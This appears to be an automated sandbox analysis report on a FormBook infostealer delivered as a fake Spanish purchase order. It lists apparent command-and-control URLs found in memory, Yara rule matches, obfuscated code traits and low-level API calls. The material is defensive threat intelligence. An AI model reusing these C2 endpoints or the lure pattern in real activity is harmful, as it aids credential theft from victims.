          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiantiying.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiantiying.com/md02/www.hecxion.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiantiying.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/www.a1b5v.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-17184.bond
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-17184.bond/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-17184.bond/md02/www.mzhhxxff.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-17184.bondReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/www.woby.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.comReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/www.rnwaifu.xyz
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyzReferer:
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/www.equipoleiremnacional.com
          Source: explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.comReferer:
          Source: explorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000A.00000002.4554376951.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000A.00000000.2162129240.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554376951.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 0000000A.00000002.4559537776.00000000113AF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000556F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://status.squarespace.com
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000A.00000002.4554886834.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2162129240.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3075767239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 7232, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: systray.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
          Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
          Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A360 NtCreateFile,9_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A410 NtReadFile,9_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A490 NtClose,9_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A540 NtAllocateVirtualMemory,9_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A35B NtCreateFile,9_2_0041A35B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A3B2 NtCreateFile,9_2_0041A3B2
